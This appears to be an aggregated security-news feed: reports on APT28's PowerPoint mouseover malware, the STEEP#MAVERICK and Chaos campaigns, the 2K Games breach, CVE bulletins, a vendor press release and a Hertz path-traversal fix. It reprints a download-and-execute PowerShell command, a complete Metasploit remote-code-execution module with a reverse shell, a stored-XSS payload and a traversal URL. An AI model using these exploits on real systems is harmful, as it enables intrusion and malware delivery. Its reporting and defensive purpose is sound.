Categories: News
Tags: APT28

Tags:  Fancy Bear

Tags:  PowerPoint

Tags:  PowerShell

Tags:  One Drive

Tags:  SyncAppvPublishingServer

The Russian APT known as Fancy Bear was caught using an old mouseover technique that doesn't need macros



(Read more...)




The post APT28 attack uses old PowerPoint trick to download malware appeared first on Malwarebytes Labs.

Researchers at Cluster25 have published research about exploit code that's triggered when a user moves their mouse over a link in a booby-trapped PowerPoint presentation.

The code starts a PowerShell script that downloads and executes a dropper for Graphite malware.

Graphite is named after Microsoft's Graph API, which it uses to access command and control (C2) resources on Microsoft OneDrive. This type of communication allows the malware to avoid detection for longer, because it only connects to legitimate Microsoft domains.

The attack was attributed to the Russian APT28 group, also known as Sofacy or Fancy Bear, a notorious Russian threat actor that has been active since at least 2004. Its main activity is collecting intelligence for the Russian government. The group is known to have targeted US politicians, organizations, and even nuclear facilities.

Cluster25 indicates that entities and individuals in the defense and government sectors of European countries may have been the potential targets of this campaign. But, as we always say, attribution is hard, and thinking you aren't a target isn't a good defense strategy.

**Malicious mouseover**

The technique used in this attack does not require macros to be enabled. It uses the Windows native SyncAppvPublishingServer utility, which is triggered by simply hovering over a hyperlink.

Basically, hovering over a mouse can be used to trigger:

SyncAppvPublishingServer.exe "n;(New-Object Net.WebClient).DownloadString('http://example.org/malice.ps1') | IEX"

Which downloads a script—malice.ps1 in my example—which can be used to execute malicious code on the affected system.

In the example discovered by Cluster25, the malicious link triggered a PowerShell script that downloaded a DLL file from OneDrive, disguised with a .jpeg extension. The file was later decrypted and written to the local path C:\ProgramData\lmapi2.dll. The script also added a registry key to execute the DLL via rundll32.exe for persistence.

The victim does not need administrator access to trigger a successful attack. This technique is by no means new—it was spotted spreading malware five years ago, in 2017.

**Mitigation**

SyncAppvPublishingServer has no business running unless the Application Virtualization (App-V) for Windows client is active on the system. App-V delivers Win32 applications to users as virtual applications, which are installed on centrally managed servers and delivered as a service in real time, on an as-needed basis. Users launch and interact with virtual applications as if they are installed locally.

So, unless you are using this functionality, it is safe to block SyncAppvPublishingServer.exe. Also, Microsoft Office's Protected View should stop the code from executing. Protected View is enabled by default and should not be disabled. You can check this by opening an Office file and clicking on **File > Options,** then **Trust Center > Trust Center Settings > Protected View** to view the active settings.

**Malwarebytes**

Malwarebytes users are protected against this attack.

Our web protection module blocks the One Drive URLs and our Real-time Protection module detects lmapi2.dll as Trojan.Downloader.

APT28 attack uses old PowerPoint trick to download malware

Malware used in the STEEP#MAVERICK campaign features rarely seen obfuscation, anti-analysis, and evasion capabilities.

A cyberattack campaign, potentially bent on cyber espionage, is highlighting the increasingly sophisticated nature of cyberthreats targeting defense contractors in the US and elsewhere.

The covert campaign, which researchers at Securonix detected and are tracking as STEEP#MAVERICK, has hit multiple weapons contractors in Europe in recent months, including potentially a supplier to the US F-35 Lightning II fighter aircraft program.

What makes the campaign noteworthy according to the security vendor is the overall attention the attacker has paid to operations security (OpSec) and to ensuring their malware is hard to detect, difficult to remove, and challenging to analyze. 

The PowerShell-based malware stager used in the attacks have "featured an array of interesting tactics, persistence methodology, counter-forensics and layers upon layers of obfuscation to hide its code," Securonix said in a report this week.

**Uncommon Malware Capabilities**

The STEEP#MAVERICK campaign appears to have launched in late summer with attacks on two high-profile defense contractors in Europe. Like many campaigns, the attack chain began with a spear-phishing email that contained a compressed (.zip) fie with a shortcut (.lnk) file to a PDF document purportedly describing company benefits. Securonix described the phishing email as being similar to one it had encountered in a campaign earlier this year involving North Korea's APT37 (aka Konni) threat group.

When the .lnk file is executed, it triggers what Securonix described as a "rather large and robust chain of stagers," each written in PowerShell and featuring as many as eight obfuscation layers. The malware also features extensive anti-forensic and counter-debugging capabilities which include monitoring a long list of processes that could be uses to look for malicious behavior. The malware is designed to disable logging and bypass Windows Defender. It uses several techniques to persist on a system, including by embedding itself in the system registry, by embedding itself as a scheduled task and by creating a startup shortcut on the system.

A spokesperson with Securonix's Threat Research Team says the number and variety of anti-analysis and anti-monitoring checks the malware has is unusual. So, too, is the large number of obfuscation layers for payloads and the malware's attempts to substitute or generate new custom command-and-control (C2) stager payloads in response to analysis attempts: "Some obfuscation techniques, such as using PowerShell get-alias to perform \[the invoke-expression cmdlet\] are very rarely seen."

The malicious activities were performed in an OpSec-aware manner with different types of anti-analysis checks and evasion attempts throughout the attack, at a relatively high operational tempo with custom payloads injected. 

"Based on the details of the attack, one takeaway for other organizations is paying extra attention to monitoring your security tools," the spokesperson says. "Organizations should ensure security tools work as expected and avoid relying on a single security tool or technology to detect threats."

**A Growing Cyber Threat**

The STEEP#MAVERICK campaign is only the latest in a growing number that have targeted defense contractors and suppliers in recent years. Many of these campaigns have involved state-backed actors operating out of China, Russia, North Korea, and other countries. 

In January, for instance, the US Cybersecurity and Infrastructure Security Agency (CISA) issued an alert warning of Russian state-sponsored actors targeting so-called cleared defense contractors (CDCs) in attacks designed to steal sensitive US defense information and technology. The CISA alert described the attacks as targeting a wide swath of CDCs, including those involved in developing combat systems, intelligence and surveillance technologies, weapons and missile development, and combat vehicle and aircraft design.

In February, researchers at Palo Alto Networks reported on at least four US defense contractors being targeted in a campaign to distribute a fileless, socketless backdoor called SockDetour. The attacks were part of a broader campaign that the security vendor had investigated along with the National Security Agency in 2021 involving a Chinese advanced persistent group that targeted defense contractors and organizations in multiple other sectors.

**Defense Contractors: A Vulnerable Segment**

Adding to the concerns over the rising volume of cyberattacks is the relative vulnerability of many defense contractors, despite having secrets that should be closely guarded. 

Recent research that Black Kite conducted into the security practices of the top 100 US defense contractors showed that nearly a third (32%) are vulnerable to ransomware attacks. This is because of factors like leaked or compromised credentials, and weak practices in areas such as credential management, application security and Security Sockets Layer/Transport Layer Security. 

Seventy-two percent of the respondents in the Black Kite report have experienced at least one incident involving a leaked credential.

There could be light at the end of the tunnel: The US Department of Defense, in conjunction with industry stakeholders, has developed a set of cybersecurity best practices for military contractors to use to protect sensitive data. Under the DoD's Cybersecurity Maturity Model Certification program, defense contractors are required to implement these practices — and get certified as having them — to be able to sell to government. The bad news? The rollout of the program has been delayed.

Sophisticated Covert Cyberattack Campaign Targets Military Contractors

An HTML injection/reflected Cross-site scripting (XSS) vulnerability was found in the ovirt-engine. A parameter "error_description" fails to sanitize the entry, allowing the vulnerability to trigger on the Windows Service Accounts home pages.

'2126353?cve=title' is not a valid bug number nor an alias to a bug.

Please press **Back** and try again.

CVE-2022-3193: Invalid Bug ID

IBM Jazz for Service Management is vulnerable to stored cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 231381.

  

**Summary**

IBM Jazz for Service Management is vulnerable to stored cross-site scripting. This vulnerability can exploit or hijack authenticated users sessions.

**Vulnerability Details**

**CVEID:**   CVE-2022-35722  
**DESCRIPTION:**   IBM Jazz for Service Management is vulnerable to stored cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session.  
CVSS Base score: 6.4  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/231381 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N)

**Affected Products and Versions**

Affected Product(s)

Version(s)

Jazz for Service Management

1.1.3

  

**Remediation/Fixes**

**Affected JazzSM Version**

**Recommended Fix.**

Jazz for Service Management versions 1.1.3.\*

**Workarounds and Mitigations**

None

**References**

Off

**Change History**

23 Sep 2022: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

Review the IBM security bulletin disclaimer and definitions regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSEKCU","label":"Jazz for Service Management"},"Component":"","Platform":\[{"code":"PF002","label":"AIX"},{"code":"PF033","label":"Windows"},{"code":"PF016","label":"Linux"}\],"Version":"1.1.3","Edition":"","Line of Business":{"code":"LOB45","label":"Automation"}}\]

CVE-2022-35722: IBM Jazz for Service Management is vulnerable to stored cross-site scripting (CVE-2022-35722)

The previously identified ransomware builder has veered in an entirely new direction, targeting consumers and business of all sizes by exploiting known CVEs through brute-forced and/or stolen SSH keys.

The powerful Chaos malware has evolved yet again, morphing into a new Go-based, multiplatform threat that bears no resemblance to its previous ransomware iteration. It's now targeting known security vulnerabilities to launch distributed denial-of-service (DDoS) attacks and perform cryptomining.

Researchers from Black Lotus Labs, the threat intelligence arm of Lumen Technologies, recently observed a version of Chaos written in Chinese, leveraging China-based infrastructure, and exhibiting behavior far different than the last activity seen by the ransomware-builder of the same name, they said in a blog post published Sept. 28.

Indeed, the distinctions between earlier variants of Chaos and the 100 distinct and recent Chaos clusters that researchers observed are so different that they say it poses a brand-new threat. In fact, researchers believe the latest variant is actually the evolution of the DDoS botnet Kaiji and perhaps "distinct from the Chaos ransomware builder" previously seen in the wild, they said.

Kaiji, discovered in 2020, originally targeted Linux-based AMD and i386 servers by leveraging SSH brute-forcing to infect new bots and then launch DDoS attacks. Chaos has evolved Kaiji's original capabilities to include modules for new architectures — including Windows — as well as adding new propagation modules through CVE exploitation and SSH key harvesting, the researchers said.

**Recent Chaos Activity**

In recent activity, Chaos successfully compromised a GitLab server and unfurled a flurry of DDoS attacks targeting the gaming, financial services and technology, and media and entertainment industries, along with DDoS-as-a-service providers and a cryptocurrency exchange.

Chaos is now targeting not only enterprise and large organizations but also "devices and systems that aren't routinely monitored as part of an enterprise security model, such as SOHO routers and FreeBSD OS," the researchers said.

And while the last time Chaos was spotted in the wild it was acting more as typical ransomware that entered networks with the purpose of encrypting files, the actors behind the latest variant have very different motives in mind, the researchers said.

Its cross-platform and device functionality as well as the stealth profile of the network infrastructure behind the latest Chaos activity appears to demonstrate that the aim of the campaign is to cultivate a network of infected devices to leverage for initial access, DDoS attacks, and cryptomining, according to the researchers.

**Key Differences, and One Similarity**

While previous samples of Chaos were written in .NET, the latest malware is written in Go, which is rapidly becoming a language of choice for threat actors due to its cross-platform flexibility, low antivirus detection rates, and difficulty to reverse-engineer, the researchers said.

And indeed, one of the reasons that the latest version of Chaos is so powerful is because it operates across multiple platforms, including not only Windows and Linux operating systems but also ARM, Intel (i386), MIPS, and PowerPC, they said.

It also propagates in a far different way than previous versions of the malware. While researchers were unable to ascertain its initial access vector, once it takes hold of a system, the latest Chaos variants exploit known vulnerabilities in a way that shows the ability to pivot quickly, the researchers noted.

"Among the samples we analyzed were reported CVEs for Huawei (CVE-2017-17215) and Zyxel (CVE-2022-30525) personal firewalls, both of which leveraged unauthenticated remote command line injection vulnerabilities," they observed in their post. "However, the CVE file appears trivial for the actor to update, and we assess it is highly likely the actor leverages other CVEs."

Chaos has indeed gone through numerous incarnations since it first emerged in June 2021 and this latest version is not likely to be its last, the researchers said. Its first iteration, Chaos Builder 1.0-3.0, purported to be a builder for a .NET version of the Ryuk ransomware, but the researchers soon noticed it bore little resemblance to Ryuk and was actually a wiper.

The malware evolved across several versions until version four of the Chaos builder that was released in late 2021 and got a boost when a threat group named Onyx created its own ransomware. This version quickly became the most common Chaos edition directly observed in the wild, encrypting some files but maintain overwritten and destroying most of the files in its path.

Earlier this year in May, the Chaos builder traded its wiper capabilities for encryption, surfacing with a rebranded binary dubbed Yashma that incorporated fully fledged ransomware capabilities.

While the most recent evolution of Chaos witnessed by Black Lotus Labs is far different, it does have one significant similarity with its predecessors — rapid growth that is unlikely to slow anytime soon, the researchers said.

The earliest certificate of the latest Chaos variant was generated on April 16; this is subsequently when researchers believe threat actors launched the new variant in the wild.

Since then, the number of Chaos self-signed certificates has shown "marked growth," more than doubling in May to 39 and then jumping to 93 for the month of August, the researchers said. As of Sept. 20, the current month has already surpassed the previous month's total with the generation of 94 Chaos certificates, they said.

**Mitigating Risk Across the Board**

Because Chaos is now attacking victims from the smallest home offices to the largest enterprises, researchers made specific recommendations for each type of target.

For those defending networks, they advised that network administrators stay on top of patch management for newly discovered vulnerabilities, as this is a principal way Chaos spreads.

"Use the IoCs outlined in this report to monitor for a Chaos infection, as well as connections to any suspicious infrastructure," the researchers recommended.

Consumers with small office and home office routers should follow best practices of regularly rebooting routers and installing security updates and patches, as well as leveraging properly configured and updated EDR solutions on hosts. These users also should regularly patch software by applying vendors' updates where applicable.

Remote workers — an attack surface that has significantly increased over the last two years of the pandemic — also are at risk, and should mitigate it by changing default passwords and disabling remote root access on machines that don't require it, the researchers recommended. Such workers also should store SSH keys securely and only on devices that require them.

For all businesses, Black Lotus Labs recommends considering the application of comprehensive secure access service edge (SASE) and DDoS mitigation protections to bolster their overall security postures and enable robust detection on network-based communications.

Chaos Malware Resurfaces With All-New DDoS & Cryptomining Modules

By Deeba Ahmed
Famous publisher 2K Games’ helpdesk platform was hacked where the attackers attempted to distribute malware to gamers’ devices.…
This is a post from HackRead.com Read the original post: 2K Games Help Desk Platform Hacked to Spread Info-stealing Malware

Famous publisher 2K Games’ helpdesk platform was hacked where the attackers attempted to distribute malware to gamers’ devices. Resultantly, 2K Games started investigating the incident and took its support platform offline last week.

It is worth noting that 2K is known for publishing some high-profile games including BioShock, WWE 2K, NBA 2K17, NBA 2K18, Evolve, Spec Ops: The Line, Max Payne Series, WWE 2K22, PGA Tour 2K, and many more.

**Incident Details**

On September 20th, 2K Games tweeted that an unauthorized third-party accessed the credentials of one of its vendors illegally. The vendor was associated with the helpdesk platform the publisher uses to offer support to its customers. The third party sent malicious links to gamers.

> “The unauthorized party sent a communication to certain players containing a malicious link. Please do not open emails or click on any links you receive from the 2K Games support account.”
> 
> 2K Games

In this campaign, the attackers first launch a fake support ticket and reply to it soon after. In their reply message, they share a file named 2K Launcher.zip. This file is a lure to invite gamers to run the file on their endpoints.

This file, in reality, hides the RedLine Stealer. It is a notorious info-stealing malware that can steal passwords stored in the browser and banking data. Moreover, it can also steal cryptocurrency wallet credentials, web browser history, VPN credentials, and cookies.

In February 2022, the RedLine Stealer was found infecting unsuspecting victims in fake Windows 11 update campaign. In July 2022, as reported by Hackread.com, the same malware was identified bundling with YTStealer and Vidar malware in an attack that was aimed at hijacking YouTube channels.

**Company Statement**

The publisher issued a statement, explaining that it will give a notification after interaction with official 2K helpdesk emails is resumed. The company will also follow up with updated information regarding how users can protect themselves against malicious activity. It is yet unclear who perpetrated the attack.

**How to Stay Protected**

Anyone who clicks on the link must immediately reset their password to stay protected, 2K Games recommends players. Since they have realized the type of malware used by the attackers, the company also suggested that players enable in-app MFA wherever possible instead of SMS-based authentication and keep checking their email accounts for forwarding rules.

> “We deeply apologize for any inconvenience and disruption that this matter may cause. We appreciate the ongoing support and understanding from our player communities.”
> 
> 2K Games

**Gamers and Malware Protection**

Big companies spend less on security. However, gaming-related hacks and malware attacks are a big problem for gamers. (_Look what “they” did to RockStar Games and its upcoming GTA 6 game_). These attacks can ruin your gaming experience and even your computer. There are a few things you can do to protect yourself from malware.

First, be careful what you download. Only download games from trusted sources. If you’re not sure if a site is safe, do some research before downloading anything.

Second, keep your computer up to date. Make sure you have the latest security updates and anti-virus software installed. This will help keep your computer safe from any new malware that comes out.

Third, be careful what you click on. Don’t click on any links in emails or on websites unless you’re sure they’re safe. Many times, malware is spread by people clicking on malicious links.

By following these simple tips, you can help protect yourself from malware and have a better gaming experience overall.

**More on Hackread.com**

1.  Fake Microsoft Helpdesk Calls Aim To Install Malware on PC
2.  Scammers Leveraging Microsoft Team GIFs in Phishing Attacks
3.  250 million Microsoft customer support records leaked in plain text
4.  Facebook Phishing: Crooks Using Messenger Chatbots to Steal Data
5.  Mainstream Live Chat widgets leaking personal details of employees

2K Games Help Desk Platform Hacked to Spread Info-stealing Malware

This Metasploit module utilizes the Mobile Mouse Server by RPA Technologies, Inc protocol to deploy a payload and run it from the server. This module will only deploy a payload if the server is set without a password (default). Tested against 3.6.0.4, the current version at the time of module writing.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = NormalRanking  include Exploit::Remote::Tcp  include Exploit::EXE # generate_payload_exe  include Msf::Exploit::Remote::HttpServer::HTML  include Msf::Exploit::FileDropper  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Mobile Mouse RCE',        'Description' => %q{          This module utilizes the Mobile Mouse Server by RPA Technologies, Inc protocol          to deploy a payload and run it from the server.  This module will only deploy          a payload if the server is set without a password (default).          Tested against 3.6.0.4, current at the time of module writing        },        'License' => MSF_LICENSE,        'Author' => [          'h00die', # msf module          'CHOKRI HAMMEDI' # edb        ],        'References' => [          [ 'EDB', '51010' ],          [ 'URL', 'https://mobilemouse.com/' ],        ],        'Arch' => [ ARCH_X64, ARCH_X86 ],        'Platform' => 'win',        'Stance' => Msf::Exploit::Stance::Aggressive,        'Targets' => [          ['default', {}],        ],        'Payload' => {          'BadChars' => "\x04\x1E"        },        'DefaultOptions' => {          'PAYLOAD' => 'windows/shell/reverse_tcp'        },        'DisclosureDate' => '2022-09-20',        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [ARTIFACTS_ON_DISK] # typing on screen        }      )    )    register_options(      [        OptPort.new('RPORT', [true, 'Port Mobile Mouse runs on', 9099]),        OptInt.new('SLEEP', [true, 'How long to sleep between commands', 3]),        OptString.new('PATH', [true, 'Where to stage payload for pull method', 'c:\\Windows\\Temp\\']),        OptString.new('CLIENTNAME', [false, 'Name of client, this shows up in the logs', '']),      ]    )  end  def path    return datastore['PATH'] if datastore['PATH'].end_with? '\\'    "#{datastore['PATH']}\\"  end  def connect_command    connect_command = 'CONNECT' # 434F4E4E454354    connect_command << "\x1E\x1E"    connect_command << @client_name    connect_command << "\x1E"    connect_command << 'iPhone' # 6950686F6E65    connect_command << "\x1E"    # the next 2,2 may be a version number of some sort    connect_command << '2' # 32    connect_command << "\x1E"    connect_command << '2' # 32    connect_command << "\x1E\x04"    sock.put(connect_command)    sleep(datastore['SLEEP'])  end  def open_command_prompt    open_command_prompt = 'KEY' # 4b4559    open_command_prompt << "\x1E"    open_command_prompt << '114' # 313134 windows key?    open_command_prompt << "\x1E"    open_command_prompt << 'r' # 72    open_command_prompt << "\x1E"    open_command_prompt << 'OPT' # 4f5054    open_command_prompt << "\x04"    sock.put(open_command_prompt)    sleep(datastore['SLEEP'])  end  def script_content(payload)    script_content = 'KEY' # 4B4559    script_content << "\x1E"    script_content << '100' # 313030    script_content << "\x1E"    script_content << payload    script_content << "\x1E\x04"    script_content << 'KEY' # 4B4559    script_content << "\x1E"    script_content << '-1' # 2d31    script_content << "\x1E"    script_content << 'ENTER' # 454e544552    script_content << "\x1E\x04"    sock.put(script_content)    sleep(datastore['SLEEP'])  end  def on_request_uri(cli, _req)    p = generate_payload_exe    send_response(cli, p)    print_good("Payload request received, sending #{p.length} bytes of payload for staging")  end  def check    if datastore['CLIENTNAME'].blank?      @client_name = Rex::Text.rand_text_alphanumeric(5..10).to_s      print_status("Client name set to: #{@client_name}")    else      @client_name = datastore['CLIENTNAME']    end    connect    print_status('Connecting')    connect_command    res = sock.get_once    if res.nil?      return CheckCode::Unknown('No response received from target')    end    disconnect    res = res.split("\x1E")    if res[1] == 'NO'      return CheckCode::Safe("Unable to connect, server response: #{res[4]}")    end    CheckCode::Appears("Connected to hostname #{res[3]} with MAC address #{res[5]}")  end  def exploit    if datastore['CLIENTNAME'].blank?      @client_name = Rex::Text.rand_text_alphanumeric(5..10).to_s      print_status("Client name set to: #{@client_name}")    else      @client_name = datastore['CLIENTNAME']    end    connect    print_status('Connecting')    connect_command    res = sock.get_once    if res.nil?      fail_with(Failure::Disconnected, 'No response received from target')    end    res = res.split("\x1E")    if res[1] == 'NO'      fail_with(Failure::NoAccess, "Unable to connect, server response: #{res[4]}")    end    vprint_good("Connected to hostname #{res[3]} with MAC address #{res[5]}")    print_status('Opening Command Prompt')    open_command_prompt    # for whatever reason, if we don't read here the server doesn't want to keep playing with us, so read but throw away    sock.get_once    print_status('Sending stager')    filename = Rex::Text.rand_text_alphanumeric(rand(8..17)) + '.exe'    register_file_for_cleanup("#{path}#{filename}")    # I attempted to put this all in one, stage, run, exit, but it was never successful, so we'll keep it in 2    stager = "certutil.exe -urlcache -f http://#{datastore['lhost']}:#{datastore['SRVPORT']}/ #{path}#{filename}"    start_service('Path' => '/') # start webserver    script_content(stager)    print_status('Opening Command Prompt again')    open_command_prompt    print_status('Executing payload')    script_content("#{path}#{filename} && exit")    handler    disconnect    sleep(datastore['SLEEP'] * 2) # give time for it to do its thing before we revert  endend

Mobile Mouse Remote Code Execution

Motopress Hotel Booking Lite plugin version 4.4.2 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: WordPress Plugin Motopress Hotel Booking Lite 4.4.2 - Stored Cross-Site Scripting (XSS)# Date: 2022-09-28# Exploit Author: Ali Alipour# Vendor Homepage: https://motopress.com/# Software Link: https://wordpress.org/plugins/motopress-hotel-booking-lite/# Version: 4.4.2# Tested on: Windows 10 Pro x64 - XAMPP Server# CVE : N/APoC:1: Install Latest WordPress2: Install and activate Latest Motopress Hotel Booking Lite (4.4.2).3: Navigate to Accommodation >> Services.4: Click on "Add New" button And Enter the JavaScript Payload in the Title Field : ( "><script>alert("XSS")</script> )5:Click on the publish button.6. Visit http://localhost/wp/services/7. XSS payload execute.

WordPress Motopress Hotel Booking Lite 4.4.2 Cross Site Scripting

Illumio Endpoint extends zero trust segmentation to see risk and set policy across macOS and Windows devices.

**Sunnyvale, Calif., Sept. 28, 2022 —** Illumio, Inc., the Zero Trust Segmentation company, today announced Illumio Endpoint®, a reimagined way to prevent breaches from spreading to clouds and data centers from laptops.

Hybrid work has expanded the attack surface, introducing new threats and making organizations more vulnerable, so it’s become increasingly important for employees to have secure access to applications and data wherever they are located. Unlike other Zero Trust Segmentation solutions, Illumio Endpoint lets your policy follow your teams’ laptops wherever they work, whether at home, in the office, or at a coffee shop. With Illumio Endpoint, the first device that gets infected will also be the last.

Organizations are more interconnected and vulnerable in hybrid workplaces, and the attack surface is growing increasingly complex. Additionally, attacks on hybrid work environments are more expensive, costing an average of about $600K more than the global average. Even with endpoint detection and response tools in place, endpoints still get breached — according to ESG, 76% of organizations experienced a ransomware attack in the past two years alone.

Illumio Endpoint includes:

· Extended visibility and segmentation policy controls for macOS and Windows devices, allowing organizations to see risk and stop attacks from spreading from laptops, workstations, and VDIs.

· A single, unified console to see and manage visibility and segmentation policy across endpoints, clouds, and data centers, making Zero Trust Segmentation easier, faster, and more efficient for security teams.

· Work from anywhere supports with segmentation policy that follows the device, so organizations have the confidence that their networks are secure, and their employees can remain productive while working from anywhere.

· The ability to control application access so users can only reach the necessary applications from their device, not the entire data center and cloud, minimizing the organization's risk from vulnerable or compromised endpoints.

  
"Before Illumio, we had only a slim idea of what kind of communications were running across our network. But with Illumio, we clearly see exactly what's connecting to individual endpoints,” said David Ault, VP of Information Security at Telhio Credit Union.

“The hybrid workforce is here to stay, which exposes organizations to a more complex attack surface and more risk, particularly on the endpoint,” said Mario Espinoza, Chief Product Officer at Illumio. “It’s important to have tools that can detect and respond to an identified breach, but unidentified attacks can spread throughout the organization to access critical data and assets when Zero Trust Segmentation is not in place to proactively contain the breach. With Illumio Endpoint, security leaders will gain the comprehensive protection needed to build resilience to attacks throughout their hybrid IT and as employees work from anywhere.”

“Ransomware and other cyberattacks often involve end user devices somewhere in the attack chain, moving laterally on to other higher-value assets,” said Dave Gruber, Principal Analyst, ESG. “Because attackers continue to find ways in and move laterally fast, prevention, detection and response mechanisms can fall short stopping these fast-moving attacks. Containment strategies such as Zero Trust Segmentation across endpoint devices can proactively stop ransomware and other fast-moving attacks from spreading to critical infrastructure and assets, reducing risk.”

To learn more about Illumio Endpoint visit: https://www.illumio.com/products/illumio-endpoint.

**About Illumio** 

Illumio, the Zero Trust Segmentation company, stops breaches and ransomware from spreading across the hybrid attack surface. The Illumio ZTS Platform visualizes all traffic flows between workloads, devices and the internet, automatically sets granular segmentation policies to control communications, and isolates high-value assets and compromised systems proactively or in response to active attacks. Illumio protects organizations of all sizes, from Fortune 100 to small business, by stopping breaches and ransomware in minutes, saving millions of dollars in application downtime, and accelerating cloud and digital transformation projects.

Illumio Introduces New Solution to Stop Endpoint Ransomware from Spreading Across the Hybrid Attack Surface

Hertz v0.3.0 ws discovered to contain a path traversal vulnerability via the normalizePath function.

Copy link

Contributor

** **ruokeqx** commented Sep 4, 2022 •**

**What type of PR is this?**

fix: A bug fix

**Check the PR title.**

*   This PR title match the format: (optional scope):
    
*   The description of this PR title is user-oriented and clear enough for others to understand.
    

**(Optional) Translate the PR title into Chinese.**

修复目录穿越漏洞

**(Optional) More detail description for this PR(en: English/zh: Chinese).**

en: fix by simply replace all backslashes with forward slashes  
zh(optional): 将反斜杠全部改成正斜杠

**Which issue(s) this PR fixes:**

Fixes #228

Currently hertz has no restriction on backslash in normalizePath function.

func normalizePath(dst, src \[\]byte) \[\]byte {
	dst \= dst\[:0\]
	dst \= addLeadingSlash(dst, src)
	dst \= decodeArgAppendNoPlus(dst, src)

	// remove duplicate slashes
	b := dst
	bSize := len(b)
	for {
		n := bytes.Index(b, bytestr.StrSlashSlash)
		if n < 0 {
			break
		}
		b \= b\[n:\]
		copy(b, b\[1:\])
		b \= b\[:len(b)\-1\]
		bSize\--
	}
	dst \= dst\[:bSize\]

	// remove /./ parts
	b \= dst
	for {
		n := bytes.Index(b, bytestr.StrSlashDotSlash)
		if n < 0 {
			break
		}
		nn := n + len(bytestr.StrSlashDotSlash) \- 1
		copy(b\[n:\], b\[nn:\])
		b \= b\[:len(b)\-nn+n\]
	}

	// remove /foo/../ parts
	for {
		n := bytes.Index(b, bytestr.StrSlashDotDotSlash)
		if n < 0 {
			break
		}
		nn := bytes.LastIndexByte(b\[:n\], '/')
		if nn < 0 {
			nn \= 0
		}
		n += len(bytestr.StrSlashDotDotSlash) \- 1
		copy(b\[nn:\], b\[n:\])
		b \= b\[:len(b)\-n+nn\]
	}

	// remove trailing /foo/..
	n := bytes.LastIndex(b, bytestr.StrSlashDotDot)
	if n \>= 0 && n+len(bytestr.StrSlashDotDot) \== len(b) {
		nn := bytes.LastIndexByte(b\[:n\], '/')
		if nn < 0 {
			return bytestr.StrSlash
		}
		b \= b\[:nn+1\]
	}

	return b
}

After:

func normalizePath(dst, src \[\]byte) \[\]byte {
	// replace all backslashes with forward slashes
	for {
		n := bytes.Index(src, bytestr.StrBackSlash)
		if n < 0 {
			break
		}
		src\[n\] \= '/'
	}
	...
}

**Codecov Report**

> Merging #229 (4ecd30e) into develop (8751608) will **decrease** coverage by 0.02%.  
> The diff coverage is 0.00%.

@@             Coverage Diff             @@
#\#           develop     #229      +/-   ##
===========================================
\- Coverage    59.19%   59.17%   -0.03%     
===========================================
  Files           79       79              
  Lines         8105     8110       +5     
===========================================
+ Hits          4798     4799       +1     
\- Misses        2953     2957       +4     
  Partials       354      354              

Impacted Files

Coverage Δ

pkg/protocol/uri.go

70.34% <0.00%> (-0.72%)

⬇️

pkg/network/standard/buffer.go

81.08% <0.00%> (-0.50%)

⬇️

Help us with your feedback. Take ten seconds to tell us how you rate us. Have a feature suggestion? Share it here.

Copy link

Contributor Author

****ruokeqx** commented Sep 4, 2022**

Copy link

Contributor Author

****ruokeqx** commented Sep 4, 2022**

> When checking other http framework source code, I find that fasthttp community fix the same bug six months ago. Maybe we can borrow some code.
> 
> valyala/fasthttp#1226 valyala/fasthttp@6b5bc7b

They just repeat the logic, there is no need to write duplicate code.  
The point is that backslash also work in windows. So, essentially, we just need to replace the backslash with forward slash, by which we, to some extent, limit the separator.  
In my limited point of view, my fix is better.

@@ -480,6 +480,15 @@ func splitHostURI(host, uri \[\]byte) (\[\]byte, \[\]byte, \[\]byte) {

}

  

func normalizePath(dst, src \[\]byte) \[\]byte {

// replace all backslashes with forward slashes

for {

n := bytes.Index(src, bytestr.StrBackSlash)

**Choose a reason for hiding this comment**

The reason will be displayed to describe this comment to others. Learn more.

1.  Seems it will double check for bytes that have been replaced, is this an performance issue on long paths?
2.  I'm not sure it's a good idea to replace src in place, maybe it's hard to understand that if normalizePath has a return value and also modifies the input parameters.

**Choose a reason for hiding this comment**

The reason will be displayed to describe this comment to others. Learn more.

> 1.  Seems it will double check for bytes that have been replaced, is this an performance issue on long paths?
> 2.  I'm not sure it's a good idea to replace src in place, maybe it's hard to understand that if normalizePath has a return value and also modifies the input parameters.

maybe this one would be better

func normalizePath(dst, src \[\]byte) \[\]byte {
	dst \= dst\[:0\]
	dst \= addLeadingSlash(dst, src)
	dst \= decodeArgAppendNoPlus(dst, src)

	// replace all backslashes with forward slashes
	if filepath.Separator \== '\\\\' {
		for i := range dst {
			if dst\[i\] \== '\\\\' {
				dst\[i\] \= '/'
			}
		}
	}
	...
}

BTW: echo use function filepath.ToSlash

https://github.com/labstack/echo/blob/master/context\_fs.go#L33

func ToSlash(path string) string {
	if Separator \== '/' {
		return path
	}
	return strings.ReplaceAll(path, string(Separator), "/")
}

**Choose a reason for hiding this comment**

The reason will be displayed to describe this comment to others. Learn more.

bytes.IndexByte will do a SIMD accelerate in some platforms. Not sure which one is better.

And since the bug only happens in Windows? Maybe add a if filepath.Separator == '\\' { to filter the platform?

The example/standard demo seems still have the problem in Windows if the url is : 127.0.0.1:8888/..%5c..%5cgo.sum

Copy link

Contributor Author

****ruokeqx** commented Sep 5, 2022 •**

> The example/standard demo seems still have the problem in Windows if the url is : 127.0.0.1:8888/..%5c..%5cgo.sum

this version solve the problem

